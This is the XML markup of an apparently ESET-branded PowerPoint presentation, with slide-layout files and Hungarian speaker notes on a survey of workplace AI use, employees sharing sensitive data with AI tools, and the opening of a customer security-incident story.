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2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66" r:id="rId1"/>
    <p:sldMasterId id="2147483968" r:id="rId2"/>
    <p:sldMasterId id="2147484055" r:id="rId3"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId37"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="2147309131" r:id="rId4"/>
    <p:sldId id="2147309009" r:id="rId5"/>
    <p:sldId id="2147309012" r:id="rId6"/>
    <p:sldId id="2147309015" r:id="rId7"/>
    <p:sldId id="2147309016" r:id="rId8"/>
    <p:sldId id="2147309017" r:id="rId9"/>
    <p:sldId id="2147309019" r:id="rId10"/>
    <p:sldId id="2147309020" r:id="rId11"/>
    <p:sldId id="2147309038" r:id="rId12"/>
    <p:sldId id="2147309021" r:id="rId13"/>
    <p:sldId id="2147309029" r:id="rId14"/>
    <p:sldId id="2147309024" r:id="rId15"/>
    <p:sldId id="2147309025" r:id="rId16"/>
    <p:sldId id="2147309026" r:id="rId17"/>
    <p:sldId id="2147309030" r:id="rId18"/>
    <p:sldId id="2147309033" r:id="rId19"/>
    <p:sldId id="2147309035" r:id="rId20"/>
    <p:sldId id="2147309039" r:id="rId21"/>
    <p:sldId id="2147309041" r:id="rId22"/>
    <p:sldId id="2147309042" r:id="rId23"/>
    <p:sldId id="2147309047" r:id="rId24"/>
    <p:sldId id="2147309052" r:id="rId25"/>
    <p:sldId id="2147309053" r:id="rId26"/>
    <p:sldId id="2147309054" r:id="rId27"/>
    <p:sldId id="2147309055" r:id="rId28"/>
    <p:sldId id="2147309056" r:id="rId29"/>
    <p:sldId id="2147309129" r:id="rId30"/>
    <p:sldId id="2147309059" r:id="rId31"/>
    <p:sldId id="2147309037" r:id="rId32"/>
    <p:sldId id="2147309130" r:id="rId33"/>
    <p:sldId id="2147309133" r:id="rId34"/>
    <p:sldId id="2147309127" r:id="rId35"/>
    <p:sldId id="2147309128" r:id="rId36"/>
  </p:sldIdLst>
  <p:sldSz cx="18288000" cy="10287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349" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="1111" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="1085" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="1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BAC1"/>
    <a:srgbClr val="C00000"/>
    <a:srgbClr val="0096A1"/>
    <a:srgbClr val="AC6B1F"/>
    <a:srgbClr val="EA6D09"/>
    <a:srgbClr val="003C41"/>
    <a:srgbClr val="424D56"/>
    <a:srgbClr val="FFB521"/>
    <a:srgbClr val="FD6E34"/>
    <a:srgbClr val="C874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2" autoAdjust="0"/>
    <p:restoredTop sz="76244" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="58" d="100"/>
          <a:sy n="58" d="100"/>
        </p:scale>
        <p:origin x="1958" y="53"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="5349"/>
        <p:guide pos="1111"/>
        <p:guide orient="horz" pos="1085"/>
        <p:guide orient="horz" pos="17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224"/>
        <p:guide pos="223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82" Type="http://schemas.microsoft.com/office/2018/10/relationships/authors" Target="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F3981E5-EB89-4A00-B018-717DADB27C2C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C9959541-1E3B-4D6C-AAA6-E8D13135E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616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B33DC-CEDB-FE05-A50D-CE9171BEA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25E165-3E54-9348-0DE2-4C9939F016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F8394F-9C47-A4F8-7911-1B81F1B839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E1EF0F-5608-7901-DE7D-CE442DEFB1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59541-1E3B-4D6C-AAA6-E8D13135EDE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3290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 smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>Mennyire bíznak meg benne a magyar munkavállalók?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>Tudatában vannak a magyar cégvezetők annak, hogy munkavállalóik a cég szenzitív adatait AI-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>jal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t> dolgoztathatják fel?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>Ön szerint a munkavállalók hány százaléka szorong az AI miatt? Mi lehet a szorongás kiváltó oka?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>Olyan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> szakemberekkel feszegettük a kérdést, mint Tari Annamária, Kerek István, Keleti Artúr vagy épp Csizmadia-Darab István </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Rambo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válaszadók 34,2%-a kapott AI-használati képzést, 65,8% nem. Ezen belül: képzés iránti igények megítélése erős: 49% nagyon fontosnak, 37,1% inkább fontosnak tartja, képzést kapjanak. 86% összesen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-H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nagyon magas szám.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72% sokan nem elég óvatosak, amikor információkat osztanak meg az AI-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(dokumentumok, üzleti terv, ügyfél-adat)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-H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Shadow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 jelenség.</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>QR kód alatt megtaláljátok a kutatást, jó szívvel ajánlom az áttekintését</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="hu-HU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90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5278B5-64AB-4E1F-BE3B-63B3040CCE8F}" type="slidenum"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907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16643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743069">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{59A06B2B-4434-8641-B3AB-AC53B0C31CAB}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr defTabSz="743069">
                <a:defRPr/>
              </a:pPr>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:prstClr val="black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784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Kezdjünk egy olyan storyval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, ami az ügyfélkörünkben történt meg nem is olyan rég.  A címben található zárójeles részre is hamarosan fény derül. Az érintett cégnél egy biztonság mérnök volt, aki felelt a teljes infrastruktúráért, és az ESET mellett a Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Defender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is futott a gépeken, végül is úgy gondolták két védelem mindenképp jobb mint egy. Sajnos ez nem teljesen igaz. Sajnos erőforráshiánnyal küzdött a kolléga, tehát nem igazán volt ideje az általunk küldött riasztásokat elemezni és feldolgozni.  Nézzünk kicsit a mélyére, hogy mi történt.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59541-1E3B-4D6C-AAA6-E8D13135EDE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81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59541-1E3B-4D6C-AAA6-E8D13135EDE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122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00F47-E316-32DA-5C2F-EB41805CE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87E203-D692-4589-6D5D-7CA78B71AA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67CF04-D398-8AE5-1DA7-E08F02AF8B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A95B6-FECC-DB84-F5E3-1D50C099CC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59541-1E3B-4D6C-AAA6-E8D13135EDE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437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B71D5-8D25-6606-FA60-95307F64D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4CDADB-CF5F-1617-13B2-4FD61A0705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EDBE83-9531-98B4-CE72-D7ED860A4A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7D1342-E6CC-43AD-D59F-17494C4193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59541-1E3B-4D6C-AAA6-E8D13135EDE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265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CECF3-D393-572E-583E-34DEE1230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374CFA-4459-93FA-9298-00DE9A8EA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68826D-DD14-6B37-9865-E5241E7600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73D60E-5F4D-0838-423B-0DBEDF517C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59541-1E3B-4D6C-AAA6-E8D13135EDE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44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73C6F-779C-0BA5-ABF1-28DC9BF78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D3FA78-18A5-7DBC-DBEF-77F3224395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056AF4-B34B-54A1-8D08-CDAA15217E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2C4B1F-03CC-B7E3-952E-F901022AA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59541-1E3B-4D6C-AAA6-E8D13135EDE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802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59541-1E3B-4D6C-AAA6-E8D13135EDE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633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59541-1E3B-4D6C-AAA6-E8D13135EDE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33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0.svg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0.svg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0.svg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4.svg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4.svg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4.svg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4.svg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4.svg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4.svg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4.sv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0.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.svg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35.png"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1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3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4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5.svg"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1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3.svg"/><Relationship Id="rId18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34.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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0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openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto4.wdp"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png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35.png"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1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3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4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5.sv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3.svg"/><Relationship Id="rId18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34.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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0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openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto4.wdp"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png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.svg"/><Relationship Id="rId7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1.png"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto3.wdp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2.wdp"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1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.svg"/><Relationship Id="rId7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1.png"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto3.wdp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2.wdp"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1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.svg"/><Relationship Id="rId7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1.png"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto3.wdp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2.wdp"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1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.svg"/><Relationship Id="rId7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1.png"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto3.wdp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2.wdp"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1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.svg"/><Relationship Id="rId7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1.png"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto3.wdp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2.wdp"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1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.svg"/><Relationship Id="rId7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1.png"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto3.wdp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto3.wdp"/><Relationship Id="rId7" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2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3.png"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto4.wdp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto7.wdp"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto3.wdp"/><Relationship Id="rId7" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2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3.png"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto4.wdp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto7.wdp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3.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto3.wdp"/><Relationship Id="rId7" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2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3.png"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto4.wdp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto7.wdp"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1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.svg"/><Relationship Id="rId7" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto3.wdp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0.png"/><Relationship Id="rId11" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2.wdp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto4.wdp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9.svg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Defaul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1536484"/>
            <a:ext cx="10724573" cy="2924984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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r>
              <a:rPr lang="en-US"/>
              <a:t>ESET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6300" y="4462177"/>
            <a:ext cx="10724573" cy="1450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500">
                <a:solidFill>
                  <a:schemeClr val="bg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err="1"/>
              <a:t>Subheadline</a:t>
            </a:r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B20EF9-3D25-52F4-8567-10AF721D02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6132779"/>
            <a:ext cx="3586162" cy="51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2500" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004B55"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="3000" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="2700" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="2400" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="2400"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>John Smith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A9820CD4-35F0-D860-6521-472B1F2F0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668813"/>
            <a:ext cx="3586162" cy="5159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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004B55"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Position at ESET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50FB943-52AF-0572-835A-1257A716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895202"/>
            <a:ext cx="3586162" cy="412806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>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="87CFD3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>1/1/2023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DA62D83-B0D2-9D5D-E860-724A170664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72000" y="8784000"/>
            <a:ext cx="4103227" cy="720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2033229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me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ADA6AD44-9C0B-77DB-5118-5247E47118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056880" y="3940925"/>
            <a:ext cx="8938260" cy="1131455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John Smith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498D56B-8EB3-7F7F-2CEF-E3634B8569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09863" y="2768600"/>
            <a:ext cx="4749800" cy="4749800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E25AB9-294A-CD6A-3474-249EEB6842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57515" y="5194302"/>
            <a:ext cx="8937625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949CA1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Job Position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A7326AE-E5AC-F8C1-8C35-1E21CD259C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57515" y="6306822"/>
            <a:ext cx="8937625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949CA1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Contacts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="270493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2A863C4-EE50-C944-62F5-23F9B7DF4C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95D6E87-A13D-F566-D62D-EB57A53FFE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4D65F5C-279D-1C32-AB79-DE7A980F5F2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C24A49B-8A2A-01E4-1C90-B689E2623C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1ECDAA4-7FBB-0A86-59CC-762B49D7AE0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620309B-D431-8C59-4EBC-F88AAD774DB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55568-8BF1-6077-6CC0-55CE0032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FB6107C-8944-6226-343E-58A4E49986B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6300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FEBDB03B-7229-2BC8-9100-D3EC5C23DE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10376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D438C226-A5A0-BEB6-A3EE-FEC5D523476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44452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0C43DD11-D6E6-A526-3F9F-BA9B5F0DC88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878528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8A0233-F797-0688-A4AD-365143E0F385}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13485223" y="3908243"/>
            <a:ext cx="0" cy="3266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0146B92-17E5-9A17-C055-C5C529BB64FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144000" y="3938066"/>
            <a:ext cx="0" cy="3266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ADACD37-F229-962F-6E3D-5B3D52EAD80B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4811486" y="3908243"/>
            <a:ext cx="0" cy="3266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7075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Number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2A863C4-EE50-C944-62F5-23F9B7DF4C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95D6E87-A13D-F566-D62D-EB57A53FFE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4D65F5C-279D-1C32-AB79-DE7A980F5F2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C24A49B-8A2A-01E4-1C90-B689E2623C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1ECDAA4-7FBB-0A86-59CC-762B49D7AE0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620309B-D431-8C59-4EBC-F88AAD774DB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55568-8BF1-6077-6CC0-55CE0032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FB6107C-8944-6226-343E-58A4E49986B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6300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FEBDB03B-7229-2BC8-9100-D3EC5C23DE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10376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D438C226-A5A0-BEB6-A3EE-FEC5D523476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44452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0C43DD11-D6E6-A526-3F9F-BA9B5F0DC88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878528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8A0233-F797-0688-A4AD-365143E0F385}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13485223" y="3908243"/>
            <a:ext cx="0" cy="3266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0146B92-17E5-9A17-C055-C5C529BB64FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144000" y="3938066"/>
            <a:ext cx="0" cy="3266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ADACD37-F229-962F-6E3D-5B3D52EAD80B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4811486" y="3908243"/>
            <a:ext cx="0" cy="3266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3232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Numbers turq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96060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96060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16802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16802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2BC72547-8891-B182-CD10-DF74AAEE8FD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96060" y="3940638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06C9AC9-EA73-2C76-6F33-7D8C21BA6E3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3096" y="3908243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119E133-4D50-B36E-1BCB-93AC1E9DD58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516802" y="3908243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B6DA327-6F6C-168B-8A3A-BDB41D164630}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="3908243"/>
            <a:ext cx="0" cy="347778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107358-D34E-AF22-15BA-D83EDBDA21FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11908971" y="3908243"/>
            <a:ext cx="0" cy="347778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460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Numbers turq">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="0096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1129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2A863C4-EE50-C944-62F5-23F9B7DF4C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95D6E87-A13D-F566-D62D-EB57A53FFE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681129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4D65F5C-279D-1C32-AB79-DE7A980F5F2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C24A49B-8A2A-01E4-1C90-B689E2623C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681129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1ECDAA4-7FBB-0A86-59CC-762B49D7AE0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620309B-D431-8C59-4EBC-F88AAD774DB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681129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55568-8BF1-6077-6CC0-55CE0032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FB6107C-8944-6226-343E-58A4E49986B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6300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FEBDB03B-7229-2BC8-9100-D3EC5C23DE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10376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D438C226-A5A0-BEB6-A3EE-FEC5D523476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44452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0C43DD11-D6E6-A526-3F9F-BA9B5F0DC88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878528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35009D-A400-30FD-A172-71507A991E1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13485223" y="3908243"/>
            <a:ext cx="0" cy="326678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4FE7FE-EF3E-851E-E521-CF73CC52F12B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144000" y="3938066"/>
            <a:ext cx="0" cy="326678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7847671-8A3E-6DB4-7EB8-EA9E0A46295B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4811486" y="3908243"/>
            <a:ext cx="0" cy="326678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61495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Images Squa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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89F496AB-79AC-606A-F043-2B1DBD6F92D8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/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Freeform: Shape 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23333665-BEF4-C268-A78E-B9D1A760458F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="14579424" y="7001300"/>
            <a:ext cx="3708576" cy="32856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/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20059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20059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226133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226133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55FF0BB-FEF2-7845-AEA2-C7C67F472F8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350296" y="3055101"/>
            <a:ext cx="3014663" cy="30146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B4AA2CD4-91AE-15D4-5047-D058C7A5156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636668" y="3055101"/>
            <a:ext cx="3014663" cy="30146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F977CC7-D310-08FD-4968-35876E337A0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856368" y="3055101"/>
            <a:ext cx="3014663" cy="30146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732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Images Squa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7FBCF3B-DC0C-B94A-05F4-DC0C79A28B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BCAD57E3-99FC-CFD5-1427-ECE47B34C9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CD1C6C9-FB60-50E2-3612-8009F9D9D34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2B5D4F1-2B80-DE54-1383-35773E0A8C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E45A7BF-3955-CB0D-9514-92CB5A39CA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2C696C4-3914-DF71-3EF4-CFFA37D99B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C4BE47FF-1E04-6D4F-5226-5B0065C0E54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C9D0B029-760D-7768-CBEB-1658F1C2F5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134AB4B-C19B-E6ED-508C-F93E79643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5B2879CF-7A50-EF39-8CB5-0DC37D20B80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72584" y="3192131"/>
            <a:ext cx="2740603" cy="2740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F6B8451A-C2D0-7BFF-0656-5531C8934D7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06660" y="3192131"/>
            <a:ext cx="2740603" cy="2740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E864AAAB-1F13-C6B3-F547-AA2E975B2C2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40736" y="3194671"/>
            <a:ext cx="2740603" cy="2740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84E51C0D-9943-3431-31D3-EC624450C4F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4274812" y="3192131"/>
            <a:ext cx="2740603" cy="2740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997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Images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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C982FBE3-24DA-EF3E-4046-AB99AEFFA9BC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Freeform: Shape 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
